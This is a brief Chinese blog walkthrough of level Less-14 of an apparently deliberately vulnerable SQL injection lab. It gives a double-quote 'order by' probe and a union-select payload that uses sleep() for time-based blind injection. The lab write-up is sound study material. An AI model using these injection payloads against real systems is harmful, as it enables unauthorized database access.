Less-14【报错注入】

利用双引号测试报错成功，查看报错信息

在利用双引号进一步测试

123" order by 3 #

查看具体列内容时，发现网页未回显，所以需要配合时间注入进行测试

123" union select if((database()='security'),sleep(10),sleep(2)),null #

posted @ 2020-10-30 09:53 峰中追风阅读(118) 评论(0) 编辑收藏举报

刷新页面返回顶部

___________________________________________________________________________________________没有白跑的路

阿俄菲格Tempt